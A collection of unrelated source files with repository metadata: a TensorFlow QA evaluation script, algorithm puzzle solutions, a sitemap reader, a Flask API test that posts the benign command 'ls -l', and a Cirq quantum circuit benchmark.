71e45223c641fee198b9a3403e9340051a5e26a4 | d15eb98c00537b6303b3b9f396eac6df5af10f20 | /transformer_RC/eval.py | 26b907dcdd6ec297c83a09f7a4a46671b8ae6b75 | [] | no_license | fooSynaptic/transfromer_NN_Block | ab17d2ac5ecc04d3fd54407d72b8dc44c5671168 | 62c7769e6dc66de8185f29ecb5a7de4f3ceb3374 | refs/heads/master | 2023-04-04T01:28:13.066026 | 2019-11-22T02:11:25 | 2019-11-22T02:11:25 | 150,613,743 | 9 | 0 | null | 2023-03-24T22:46:39 | 2018-09-27T16:05:59 | Python | UTF-8 | Python | false | false | 5,632 | py | # -*- coding: utf-8 -*-
#/usr/bin/python3
import codecs
import os
import tensorflow as tf
import numpy as np
from hyperparams import rc_Hyperparams as hp
from data_load import load_vocabs, load_train_data, load_test_data, create_data
from train import Graph
#from nltk.translate.bleu_score import corpus_bleu
import argparse
#from sklearn.metrics import classification_report
#from utils import compute_bleu_rouge
import pandas as pd
from modules import bleu
def find_best_answer_for_passage(start_probs, end_probs, passage_len=None):
"""
Finds the best answer with the maximum start_prob * end_prob from a single passage
"""
if passage_len is None:
passage_len = len(start_probs)
else:
passage_len = min(len(start_probs), passage_len)
best_start, best_end, max_prob = -1, -1, 0
for start_idx in range(passage_len):
#within the span of answer limit
for ans_len in range(hp.ans_maxlen):
end_idx = start_idx + ans_len
if end_idx >= passage_len:
continue
prob = start_probs[start_idx] * end_probs[end_idx]
if prob > max_prob:
best_start = start_idx
best_end = end_idx
max_prob = prob
return (best_start, best_end), max_prob
def eval(task_name):
# Load graph
g = Graph(is_training=False)
print("Graph loaded")
# Load data
test_data = pd.read_csv(hp.testfile)
questions, contents, q_lens, p_lens, start_pos, end_pos = load_test_data()
raw_passages = list(test_data['content'])
reference_answers = list(test_data['answer'])
word2idx, idx2word = load_vocabs()
# Start session
with g.graph.as_default():
sv = tf.train.Supervisor()
with sv.managed_session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
## Restore parameters
sv.saver.restore(sess, tf.train.latest_checkpoint(hp.logdir))
print("Restored!")
## Get model name
print('Model dir:', hp.logdir)
mname = open(hp.logdir + '/checkpoint', 'r').read().split('"')[1] # model name
print("Model name:", mname)
## Inference
if not os.path.exists('results'): os.mkdir('results')
with codecs.open("results/" + mname, "w", "utf-8") as fout:
pred_answers, ref_answers = [], []
pred_dict, ref_dict = {}, {}
ques_id = 0
eval_dict = {'bleu_1':[], 'bleu_2':[], 'bleu_3':[], 'bleu_4':[]}
for i in range(len(questions) // hp.batch_size):
print("Iterator: {} / {}".format(i, len(questions)//hp.batch_size))
### Get mini-batches
q = questions[i*hp.batch_size: (i+1)*hp.batch_size]
p = contents[i*hp.batch_size: (i+1)*hp.batch_size]
q_length = q_lens[i*hp.batch_size: (i+1)*hp.batch_size]
p_length = p_lens[i*hp.batch_size: (i+1)*hp.batch_size]
s_pos = start_pos[i*hp.batch_size: (i+1)*hp.batch_size]
e_pos = end_pos[i*hp.batch_size: (i+1)*hp.batch_size]
passages = raw_passages[i*hp.batch_size: (i+1)*hp.batch_size]
ref_answers = reference_answers[i*hp.batch_size: (i+1)*hp.batch_size]
feed_dict = {g.q: q,
g.p: p,
g.q_length: q_length,
g.p_length: p_length,
g.start_label: s_pos,
g.end_label: e_pos}
start_probs, end_probs = sess.run([g.start_probs, g.end_probs], feed_dict)
### Write to file
for start_prob, end_prob, passage, ref in zip(start_probs, end_probs, passages, ref_answers):
pred_span, prob = find_best_answer_for_passage(start_prob, end_prob)
pred_answer = passage[pred_span[0]: pred_span[1]+1]
if not len(pred_answer) > 0: continue
pred_dict[str(ques_id)] = [pred_answer]
ref_dict[str(ques_id)] = [ref]
ques_id += 1
fout.write('-ref: '+ ref)
fout.write("-pred: "+ pred_answer)
b1, b2, b3, b4 = bleu(list(pred_answer), list(ref), 1), \
bleu(list(pred_answer), list(ref), 2), \
bleu(list(pred_answer), list(ref), 3), \
bleu(list(pred_answer), list(ref), 4)
eval_dict['bleu_1'].append(b1)
eval_dict['bleu_2'].append(b2)
eval_dict['bleu_3'].append(b3)
eval_dict['bleu_2'].append(b2)
for metric in eval_dict:
fout.write(metric + '\t' + str(np.mean(eval_dict[metric])) + '\n')
print(metric + '\t' + str(np.mean(eval_dict[metric])))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Choice the task you want to eval.')
parser.add_argument('--task', help='task name(default: RC)')
args = parser.parse_args()
task_name = args.task
eval(task_name)
print("Done")
| [
"hujiaxin@ajmide.com"
] | hujiaxin@ajmide.com |
33bf6b98e2e6b8bbde66d8196ef5407b2978efbb | 2073b98ec0f42c0cca08480cad534aa11fee6101 | /solution/src/SecondGo.py | 2402d26443d1b3a2382ed8295292545cf564cb1e | [] | no_license | chrisjdavie/ReverseShuffleMerge | 47c81fcdab26177676b0a82402bb61a2440c8027 | 184f09f7f83a11d4904874d91853dc4467f4f219 | refs/heads/master | 2021-01-10T13:43:48.666040 | 2016-01-02T15:13:22 | 2016-01-02T15:13:22 | 48,913,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,286 | py | '''
First go ran over the time limit, which isn't surprising as I brute
forced with permutations. Looking at this, there is a more elegant
solution, but it's not clear immediately how. But it's there.
Okay, this approach worked, but it's not the clearest what's going on.
Esentially, there are the merged counts and the reverse counts,
and I first deplete the merged counts and then the reverse counts,
always looking for the next best (and removing that from the reverse
counts when found.)
A better solution (in terms of code simplicity, probably takes much
longer in alg terms), that I can't be bothered to implement right now,
is finding the best characters, and then filling those up, adding in
any that go over the limit. There's also a trick, keeping track of the
previous minimum value, and if you hit a crappy one, substitute that
in, then reversing to that point (repopulating the arrays appropriately)
and starting again.
I'm not 100% I've got the reversing right in my alg, I think there
might be some cases it doesn't work, but I'm not sure, I might be
okay.
Created on 1 Jan 2016
@author: chris
'''
import copy
from collections import Counter
def smallercharBest(testString, highChar, charCountsRemain):
# finds the smallest character in a test string (with some
# constraints)
minChar = 'zz'
for testChar in testString:
if testChar < minChar and charCountsRemain[testChar] > 0 \
and testChar < highChar:
minChar = testChar
if minChar == 'zz':
return minChar, -1
else:
return minChar, testString.index(minChar)
def updateBestChar(charBest, reversedCharsCounter, bestUnique):
# Checks if all of the best character have been found,
# and then sets the next best as the character to look for
if reversedCharsCounter[charBest] == 0:
if len(bestUnique) == 0:
charBest = 'zz'
else:
charBest = bestUnique.pop(0)
return charBest
mixedString = raw_input().strip()
# find characters in original string
elements = Counter(mixedString)
reversedCharsCounter = Counter()
for char in elements:
reversedCharsCounter[char] = elements[char]/2
uniqueChars = set(reversedCharsCounter.elements())
# try with the most lexicographically ordered test
bestUnique = sorted(list(uniqueChars))
op = []
mergedCharsCounter = copy.deepcopy(reversedCharsCounter)
remainString = list(mixedString[::-1])
charBest = bestUnique.pop(0)
indsPop = []
prevCharInd = 0
for i, charRemain in enumerate(remainString):
if charRemain == charBest:
# found the best character, add to output
op.append(charRemain)
reversedCharsCounter[charRemain] -= 1
prevCharInd = i
elif mergedCharsCounter[charRemain] > 0:
# skips this character, assigns it to the merged characters
mergedCharsCounter[charRemain] -= 1
elif reversedCharsCounter[charRemain] > 0:
# if there are characters of charRemain to be found in the
# reversed character, seek lexiographically smaller characters
# between this and the previous character.
#
# then append this character to the output.
resetInd = i
if ord(charRemain) - ord(charBest) > 1:
smallerInd = 0
while smallerInd > -1:
smallChar, smallerInd = smallercharBest(remainString[prevCharInd+1:i],
charRemain,
reversedCharsCounter)
if smallerInd > -1:
op.append(smallChar)
reversedCharsCounter[smallChar] -= 1
prevCharInd += 1 + smallerInd
mergedCharsCounter[smallChar] += 1
try:
resetInd = prevCharInd + 1 + remainString[prevCharInd+1:i].index(charRemain)
except(ValueError):
pass
op.append(charRemain)
reversedCharsCounter[charRemain] -= 1
prevCharInd = resetInd
charBest = updateBestChar(charBest, reversedCharsCounter, bestUnique)
if charBest == 'zz':
break
print "".join(op)
| [
"chris.d@theasi.co"
] | chris.d@theasi.co |
16db50922eb05c4853e1a5a7bf928ed0a8659684 | 3a4fbde06794da1ec4c778055dcc5586eec4b7d2 | /@lib/12-13-2011-01/vyperlogix/sitemap/reader.py | db72d9f10eac4984c687669739d3f543c9c1f55b | [] | no_license | raychorn/svn_python-django-projects | 27b3f367303d6254af55c645ea003276a5807798 | df0d90c72d482b8a1e1b87e484d7ad991248ecc8 | refs/heads/main | 2022-12-30T20:36:25.884400 | 2020-10-15T21:52:32 | 2020-10-15T21:52:32 | 304,455,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,192 | py | import re
import string
import sys
import httplib
import urllib2
from xml.dom import minidom
from vyperlogix.misc import _utils
__copyright__ = """\
(c). Copyright 2008-2014, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
class ModelSitemap:
def __init__(self):
self.data = []
def links (self, address):
file_request = urllib2.Request(address)
file_opener = urllib2.build_opener()
file_feed = file_opener.open(file_request).read()
items = []
file_feed = _utils.ascii_only(file_feed)
try:
file_xml = minidom.parseString(file_feed)
item_nodes = file_xml.getElementsByTagName("url")
for item in item_nodes:
nodes = []
for node in [n for n in item.childNodes if (n.nodeName == 'loc')]:
try:
nodes.append(node.firstChild.data)
except:
pass
for n in nodes:
items.append(n)
except Exception, e:
info_string = _utils.formattedException(details=e)
items.append(info_string)
items.append(str(file_feed))
return items
def read_sitemap_links(url):
sitemap = ModelSitemap()
links = sitemap.links(url)
return links
if __name__ == "__main__":
import sys
print >>sys.stdout, __copyright__
print >>sys.stderr, __copyright__
| [
"raychorn@gmail.com"
] | raychorn@gmail.com |
21406bbc518e376d68ec6a67b0ff2d8424741171 | 686d2e525b7cd7a792501309f251dbf6dcea7ef4 | /leetcode/dynamic programming/26.62 不同的路径.py | f04f16a4ae7089ade35d23be260e8a2168acc76d | [] | no_license | freemanwang/Algorithm | fa23c9c33c43f942e72d9d1828a95417e7c99575 | bb691c1afb460a382d7aaaa308e8b4e17f5bf4c5 | refs/heads/master | 2020-06-29T19:37:32.584724 | 2020-02-07T06:36:29 | 2020-02-07T06:36:29 | 200,605,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | '''
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
问总共有多少条不同的路径?
说明:m 和 n 的值均不超过 100。
示例 1:
输入: m = 3, n = 2
输出: 3
解释:
从左上角开始,总共有 3 条路径可以到达右下角。
1. 向右 -> 向右 -> 向下
2. 向右 -> 向下 -> 向右
3. 向下 -> 向右 -> 向右
示例 2:
输入: m = 7, n = 3
输出: 28
'''
# 应用动态规划解决问题
#状态转移:走到(m,n) 只能由 (m-1,n) 向右走一格 或者 (m,n-1) 向下走一格
# 最优子结构:F(m, n) = F(m-1, n) + F(m, n-1)
# 边界: | [
"121689123@qq.com"
] | 121689123@qq.com |
b2b21d3ee8516a7cfb2bf97d2d121a455ef2fad3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03479/s210485900.py | 104cb0c9d70362d67521ce65fec1cbf0a4e8d9bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
x, y = list(map(int, readline().split()))
ans = 0
c = x
while c <= y:
ans += 1
c <<= 1
print(ans)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d8d63477b2da98c431cad1a9d38bd02193e100f4 | 9bb958a3b5ae3a083a265b37bc1f83fc2c41bdfd | /tests/test_api.py | cfdaa9bc9819e93aa32461dc45c32babf4eee411 | [] | no_license | chfw/Minion | 434ccd6042f8730151b6fdf711b6f9e0cd7f077d | 88093463de0ad4b30f63f7bc933c8dbcd13888da | refs/heads/master | 2020-12-03T04:07:55.727275 | 2017-06-29T20:57:26 | 2017-06-29T20:57:26 | 95,818,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import sys
import json
from nose.tools import eq_
from minion.app import create_app
PY2 = sys.version_info[0] == 2
class TestViews:
def setUp(self):
self.app = create_app()
self.client = self.app.test_client()
def test_api_run_view(self):
data = {
'command': 'ls -l'
}
response = self._request_api_run_view(data)
if PY2:
response_json = json.loads(response.data)
else:
response_json = json.loads(
response.data.decode('utf-8'))
eq_(response.status_code, 200)
assert('setup.py' in response_json['result'])
def test_api_run_view_with_wrong_payload(self):
data = {
'commando': 'ls -l'
}
response = self._request_api_run_view(data)
if PY2:
response_json = json.loads(response.data)
else:
response_json = json.loads(
response.data.decode('utf-8'))
eq_(response.status_code, 400)
assert('In correct instructions, Master' in response_json['message'])
def _request_api_run_view(self, data):
headers = {
'Content-Type': 'application/json'
}
response = self.client.post(
'/api/run/',
data=json.dumps(data),
headers=headers)
return response
| [
"wangc_2011@hotmail.com"
] | wangc_2011@hotmail.com |
45d161818d304c8026b94370ed51ef93080f25dc | 1f3120356dbc5278dc5fb9e23017bb4b1ea1e466 | /docker/lib/python3.7/weakref.py | f7c3acae7c93193c9ad49cb283dfa73807cdfd77 | [] | no_license | AllenMkandla/intro_to_docker | 94669c3647348651b4ba31734dcb9ea6a74f9241 | 1aa812852bcd6b21613bc81e3bd44fa9e3193e14 | refs/heads/master | 2022-04-17T18:27:03.515706 | 2020-04-18T15:37:55 | 2020-04-18T15:37:55 | 256,784,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | /home/allen/anaconda3/lib/python3.7/weakref.py | [
"allen.mkandla@umuzi.org"
] | allen.mkandla@umuzi.org |
0c5be048707b2514b3ed824531d847aee604bf4b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startCirq1993.py | 6838def910331cff05b9e13bcc3360a738377755 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,775 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=32
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.Y.on(input_qubit[3])) # number=12
c.append(cirq.H.on(input_qubit[3])) # number=29
c.append(cirq.CZ.on(input_qubit[2],input_qubit[3])) # number=30
c.append(cirq.H.on(input_qubit[3])) # number=31
c.append(cirq.H.on(input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[1])) # number=6
c.append(cirq.H.on(input_qubit[2])) # number=24
c.append(cirq.CZ.on(input_qubit[3],input_qubit[2])) # number=25
c.append(cirq.H.on(input_qubit[2])) # number=26
c.append(cirq.H.on(input_qubit[2])) # number=7
c.append(cirq.H.on(input_qubit[3])) # number=8
c.append(cirq.X.on(input_qubit[2])) # number=23
c.append(cirq.H.on(input_qubit[3])) # number=16
c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=17
c.append(cirq.H.on(input_qubit[3])) # number=18
c.append(cirq.X.on(input_qubit[3])) # number=14
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=15
c.append(cirq.Y.on(input_qubit[2])) # number=10
c.append(cirq.Y.on(input_qubit[2])) # number=11
c.append(cirq.X.on(input_qubit[1])) # number=20
c.append(cirq.X.on(input_qubit[1])) # number=21
c.append(cirq.X.on(input_qubit[3])) # number=27
c.append(cirq.X.on(input_qubit[3])) # number=28
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq1993.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.